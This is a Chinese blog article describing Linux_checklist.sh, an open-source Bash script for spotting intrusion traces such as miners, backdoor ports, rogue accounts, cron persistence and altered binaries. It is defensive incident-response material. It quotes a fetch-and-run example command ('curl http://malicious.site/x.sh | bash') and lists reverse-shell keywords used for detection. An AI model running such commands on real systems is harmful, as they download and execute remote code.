Linux黑客入侵痕迹排查实战指南:一个脚本帮你揪出“隐形杀手”
Linux黑客入侵痕迹排查实战指南一个脚本帮你揪出“隐形杀手”前几天在某公众号看到一篇介绍Linux_checklist.sh开源工具的文章受到启发将其整理出来与大家分享。它能自动化完成7大模块、超过20项关键安全检查助你快速定位系统入侵痕迹。面对日益猖獗的 Linux 系统入侵事件从挖矿木马、勒索软件到高级持续性威胁APT黑客往往会精心隐藏自己的踪迹使传统检查手段难以发现。安全运维人员经常面临一个难题系统似乎运行正常但 CPU 悄无声息地满载或者深夜突然出现异常的外联流量。如何系统性地进行安全排查而不是“头痛医头脚痛医脚”今天介绍一款开源工具Linux_checklist.sh它将复杂的入侵痕迹排查自动化、系统化涵盖从系统资源、网络连接到文件完整性的全方位检查。项目地址https://github.com/HuyaThomas/Linux_checklist01 工具概览7大检查模块Linux_checklist.sh 是一个 Bash 脚本专为快速、全面地检查 Linux 系统安全状况而设计。它不需要安装额外依赖直接在目标系统上运行即可生成详尽的诊断报告。脚本的核心设计理念是“无遗漏、可追溯”其检查逻辑覆盖了黑客入侵后最常见的行为模式和痕迹残留。脚本主要包含七大检查模块系统资源检查排查挖矿等资源消耗型恶意软件。网络连接分析探测后门连接与异常监听。进程深度分析捕捉无文件落地攻击等高级威胁。账号与权限审计发现未授权账户与权限滥用。持久化与启动项扫描清除病毒自启动机制。文件完整性校验检测 Rootkit 和系统命令篡改。日志与痕迹分析还原攻击者的操作路径。每个模块都针对特定的安全威胁设计组合起来形成了一套完整的安全体检方案。02 系统资源检查挖矿木马的“照妖镜”挖矿木马是当前 Linux 系统面临的最常见威胁之一其典型特征就是异常高的 CPU 或内存占用。脚本首先会检查系统负载列出资源占用 Top5 的进程。一个正常的数据库或 Web 服务进程突然持续占用 90% 以上的 CPU就非常可疑。除了进程列表脚本还会检查磁盘空间使用情况。黑客有时会用日志文件或临时文件填满磁盘制造服务瘫痪或掩盖其他恶意行为。内存使用情况也是关键指标。某些高级木马会尽量降低 CPU 使用率以避免被发现但内存中会残留异常进程。通过对比/proc/meminfo和实际进程占用可以发现隐藏的内存消耗。03 网络连接分析切断黑客的“生命线”网络连接是黑客控制受害主机的通道也是排查的重点。首先检查网卡是否处于混杂模式。这是内网嗅探的典型迹象黑客可能正在抓取内网传输的密码或敏感数据。脚本会检查每个网络接口的PROMISC标志。DNS 和 Hosts 文件检查能发现网络劫持。黑客常修改这些配置将合法域名指向自己的恶意服务器。脚本会对比当前 DNS 设置与已知安全配置并扫描/etc/hosts中的异常条目。端口监听检查能暴露隐藏的后门。除了常见的 22、80、443 端口脚本会列出所有监听端口特别是高位端口如 31337、44444 等这些常被用作反向 Shell 或 C2 通信端口。外部连接统计能发现命令与控制C2服务器。脚本会列出连接最频繁的外部 IPTop10帮助识别可疑的境外 IP 或已知的恶意域名解析结果。04 进程深度分析揪出“隐身”恶意程序现代恶意软件越来越擅长隐藏自己传统的ps命令可能已经失效。检查内存中已删除文件是脚本的核心功能之一。通过遍历/proc/[pid]/exe符号链接脚本能发现那些“进程仍在运行但对应的可执行文件已被删除”的情况。这是无文件攻击和 Rootkit 的典型特征旨在逃避基于文件的杀毒软件扫描。分析高资源进程的详细信息包括其启动参数、父进程关系、打开的文件描述符等。一个通过curl http://malicious.site/x.sh | bash启动的进程其参数中会残留恶意 URL 痕迹。进程树分析能揭示攻击链条。例如一个短暂的wget进程下载了某个脚本该脚本又启动了另一个守护进程这种父子关系在正常的运维操作中很少见。05 账号与权限审计守住系统“大门”权限提升和账号滥用是黑客维持访问的常用手段。检查特权用户不止于root。脚本会扫描/etc/passwd查找所有 UID0 的用户。黑客常创建隐藏的超级用户账号如将普通用户的 UID 改为 0或在用户名中加入不可见字符。影子文件分析/etc/shadow能发现哪些账户实际上可以登录密码字段不为*或!。一个被禁用的服务账户突然有了可登录的密码极可能已被入侵。Sudo 权限审计检查/etc/sudoers和/etc/sudoers.d/中的配置找出谁拥有ALL(ALL) ALL这类过高权限。黑客可能会给某个被控账户添加 sudo 权限方便后续操作。SSH 公钥检查遍历/root/.ssh/authorized_keys和所有/home/*/.ssh/authorized_keys文件。一个未知的公钥可能意味着攻击者已经设置了免密登录后门。SSH 劫持检测检查是否存在~/.ssh/rc或/etc/ssh/sshrc文件这些文件中的命令会在用户通过 SSH 登录时自动执行是理想的恶意脚本植入点。06 持久化与启动项斩断“复活”机制即使清除了恶意进程如果未清除其持久化机制系统重启后木马还会“复活”。定时任务检查是最重要的环节。脚本不仅检查/etc/crontab和/etc/cron.d/还会遍历所有用户的crontab -l结果。特征匹配会自动扫描任务中是否包含wget、curl、nc、bash -i、perl -e等常用于下载或建立反向 Shell 的命令。系统启动项检查涵盖 Systemd 服务systemctl list-unit-files --typeservice --stateenabled和传统的/etc/rc.local。黑客常会创建伪装成系统服务的恶意 Unit 文件或在rc.local末尾添加一行启动命令。其他持久化位置如~/.bashrc、~/.profile、/etc/profile.d/也可能被注入恶意命令脚本会对这些文件进行关键词扫描。07 文件完整性校验发现“李鬼”命令Rootkit 的核心技术就是替换系统命令如将ps替换为不显示恶意进程的版本。二进制校验利用系统包管理器如 RPM的校验功能。执行rpm -Vf /bin/ls等命令对比核心命令的哈希值与官方包中的值是否一致。任何修改包括文件大小、MD5、权限、所有者都会被标记出来。SUID 文件扫描查找具有 SetUID 权限的可执行文件。这些文件运行时具有文件所有者的权限常为 root如果被植入后门普通用户执行即可提权。脚本会列出系统中所有 SUID 文件并重点标记那些非常规位置或可疑名称的文件。临时目录扫描检查/tmp和/var/tmp下是否有.sh、.py、.elf等可执行文件。黑客常在这些权限宽松的目录暂存攻击工具。文件属性检查发现被chattr i锁定的文件。黑客可能会锁定自己的恶意文件防止被管理员删除也可能会锁定关键的日志文件阻止攻击记录被写入。08 日志与痕迹分析还原攻击时间线日志是事后调查的宝贵证据黑客往往会尝试清除或篡改日志。暴力破解分析统计/var/log/secureRHEL/CentOS或/var/log/auth.logDebian/Ubuntu中登录失败次数最多的 IP 地址。某个 IP 在短时间内尝试了数百次 SSH 登录很可能是在进行暴力破解。成功登录记录显示最近成功登录的用户、时间和源 IP。一个来自异常地理位置或非工作时间的 root 登录值得深入调查。账号变动记录搜索useradd和userdel的操作日志。攻击者常会创建隐藏账户作为后门或在退出前删除自己创建的临时账户。历史命令审计扫描 root 用户的~/.bash_history以及其他有 sudo 权限用户的命令历史。搜索wget、curl下载木马、tar打包外传数据、passwd修改密码、chmod 777放宽权限等敏感操作。注意高级黑客会清空或篡改.bash_history所以它的缺失或异常简短也是一个警示信号。09 实战使用指南获取与运行wgethttps://raw.githubusercontent.com/HuyaThomas/Linux_checklist/main/linux_checklist.shchmodx linux_checklist.shsudo./linux_checklist.sh建议使用sudo运行以确保能访问所有必要的系统信息和文件。输出解读脚本执行后会生成一份结构化的报告通常输出到屏幕并保存到文件。报告按上述七大模块组织每个发现项会标记严重级别高危强烈建议立即处理如发现未知 SUID 文件、恶意定时任务。中危需要尽快审查如异常的高资源进程、非常规监听端口。低危/信息供参考或优化使用如磁盘空间不足警告。安全注意事项仅在授权环境下运行此脚本。脚本会读取大量系统敏感信息如影子文件、私钥位置、进程内存映射等输出文件必须妥善保管避免二次泄露。建议在隔离环境中分析报告。将输出文件传输到安全的分析机上进行查看避免在可能已被入侵的主机上直接打开防止潜在的键击记录或屏幕捕获恶意软件。结合其他工具交叉验证。对于脚本发现的异常项可使用strace、lsof、netstat -anp等原生命令进行深入分析或使用chkrootkit、rkhunter等专业 Rootkit 检测工具进行二次扫描。10 总结主动防御防患未然Linux_checklist.sh 的价值不仅在于“事后检测”更在于“主动防御”。定期运行此脚本可以在攻击者完全控制系统前发现蛛丝马迹。它尤其适合以下场景云服务器或 VPS 突发性能异常时快速判断是否被植入挖矿程序。安全事件应急响应时系统化收集证据避免遗漏关键痕迹。新接手或重要业务上线前进行全面的安全基线检查。作为自动化安全监控的一部分定期生成安全状态报告。安全是一场攻防不对称的战争攻击者只需要找到一个漏洞而防御者需要守护整个系统。通过自动化工具将重复、复杂的检查流程标准化运维人员可以将更多精力投入到安全架构优化和威胁分析中真正提升系统的整体安全水位。正如美国计算机应急准备小组US-CERT所言“预防是理想的但检测是必须的。” 在复杂的网络环境中没有任何系统能保证100%不被入侵关键在于能否快速发现、准确定位、有效清除。

相关新闻

暴击!CSPM-4考试改版!很多新增内容,这变化有点太猛了...

暴击!CSPM-4考试改版!很多新增内容,这变化有点太猛了...

最近,中国标准化协会陆续公布了2026年CSPM最新版考试大纲,大家都看了没🤔? 考试更新迭代其实是很正常的事情,不过这次考试改版,尤其是CSPM-4的新考纲,变化幅度可以说是相当大! 1.新…

2026/7/6 15:23:27 阅读更多 →
本地部署管理助手 Grocy 并实现外部访问

本地部署管理助手 Grocy 并实现外部访问

Grocy 是一款一个自托管的 PHP 网络应用程序,可用于记录物品信息并根据个性化需求进行管理。支持购物清单、家庭用品库存、日常任务及食谱管理,覆盖家庭生活的多个方面,提升组织效率。方便用户清理家庭杂物,避免使用过期物品。本文…

2026/7/8 17:02:16 阅读更多 →
知识图谱:重塑科技创新生态的数智引擎

知识图谱:重塑科技创新生态的数智引擎

科易网AI技术转移与科技成果转化研究院 科技创新是推动经济社会发展的核心驱动力,而科技成果转化作为连接创新与产业的关键环节,其效率与效果直接影响着创新生态的活力。在数字化转型浪潮下,以知识图谱为代表的数据智能技术,正逐…

2026/7/9 22:58:42 阅读更多 →

最新新闻

STM32与LTC1864高精度ADC的SPI通信实现

STM32与LTC1864高精度ADC的SPI通信实现

1. 项目背景与核心需求在工业控制和嵌入式系统开发中,模拟信号与数字系统的无缝集成一直是工程师面临的关键挑战。LTC1864作为一款16位高精度ADC转换器,配合STM32F101ZG这类主流微控制器,能够构建高性能的模拟信号采集系统。这种组合特别适合…

2026/7/10 0:03:07 阅读更多 →
VS Code容器化开发NanoPi2Fire嵌入式CMake环境

VS Code容器化开发NanoPi2Fire嵌入式CMake环境

1. 项目概述:为什么要在VSC里用容器跑NanoPi2Fire的CMake开发环境?“使用VSC容器化开发CMake配置NanoPi2Fire开发环境”——这个标题里藏着三个关键动作:容器化是手段,CMake是构建中枢,NanoPi2Fire是目标硬件。它不是在…

2026/7/9 23:57:05 阅读更多 →
Android GUI Agent技术解析:INJECT_EVENTS与虚拟屏幕实战

Android GUI Agent技术解析:INJECT_EVENTS与虚拟屏幕实战

1. 项目概述:我们到底在分析什么?“豆包 手机 - 技术分析篇”这个标题乍看像是一款App评测,但结合热搜词里反复出现的GUI agent、INJECT_EVENTS、虚拟屏幕、声纹检测,再叠加上“hermes agent gui下载教程”“如何卸载虚拟屏幕”“…

2026/7/9 23:55:04 阅读更多 →
Hermes Agent:分布式智能体调度中枢与MCP协议实践

Hermes Agent:分布式智能体调度中枢与MCP协议实践

1. Hermes Agent 不是“又一个定时工具”,而是分布式智能体的调度中枢你可能在 SpringBoot 项目里写过Scheduled(cron "0 0 * * * ?"),也可能在 Linux 上配过crontab -e,甚至用过 XXL-JOB 或 Quartz 做集群任务分发——但这些方案…

2026/7/9 23:55:04 阅读更多 →
AI Coding Agent 沙箱的设计原理解析

AI Coding Agent 沙箱的设计原理解析

1. 引言 随着大语言模型(LLM)在代码生成领域的广泛应用,AI Coding Agent 已成为开发者日常效率提升的重要工具。然而,AI 生成的代码天然存在不可靠性——可能包含语法错误、逻辑缺陷、安全漏洞,甚至恶意代码。为了在「…

2026/7/9 23:55:04 阅读更多 →
【2027最新】基于SpringBoot+Vue的房屋租赁管理系统管理系统源码+MyBatis+MySQL

【2027最新】基于SpringBoot+Vue的房屋租赁管理系统管理系统源码+MyBatis+MySQL

博主介绍: ✨ 专业背景 专注Java企业级开发与小程序生态,全网影响力10万开发者,CSDN特邀作者、技术专家、新星计划导师。 🎯 核心服务 📚 毕业设计智库 微信小程序方向:100个前沿选题 Java企业级方向&#…

2026/7/9 23:53:03 阅读更多 →

日新闻

STM32与LTC1864高精度ADC的SPI通信实现

STM32与LTC1864高精度ADC的SPI通信实现

1. 项目背景与核心需求在工业控制和嵌入式系统开发中,模拟信号与数字系统的无缝集成一直是工程师面临的关键挑战。LTC1864作为一款16位高精度ADC转换器,配合STM32F101ZG这类主流微控制器,能够构建高性能的模拟信号采集系统。这种组合特别适合…

2026/7/10 0:03:07 阅读更多 →

周新闻

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容

B站视频下载神器BiliTools:5分钟学会轻松保存任何B站内容 【免费下载链接】BiliTools A cross-platform bilibili toolbox. 跨平台哔哩哔哩工具箱,支持下载视频、番剧等等各类资源 项目地址: https://gitcode.com/GitHub_Trending/bilit/BiliTools …

2026/7/8 16:14:06 阅读更多 →
威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型全解析:从新手入门到实战应用,助你构建安全产品!

威胁模型的陌生现状在忙碌疲惫的一天里,参与了关于混合后量子密码学的讨论,应付端点攻击找茬的人,还参与留言板讨论后,发现“威胁模型”对多数人仍是陌生概念,且多被当作时髦用语。有趣的相关画作有一幅由 Embyr 创作的…

2026/7/9 13:46:46 阅读更多 →
渗透测试入门指南:从零基础到实战环境搭建

渗透测试入门指南:从零基础到实战环境搭建

1. 从“看热闹”到“入门”:我理解的渗透测试到底是什么?每次看到新闻里说某个大公司的数据被“黑”了,或者某个网站被攻击导致服务瘫痪,你是不是和我一样,心里会冒出两个念头:一是“这黑客真厉害”&#x…

2026/7/9 21:41:05 阅读更多 →

月新闻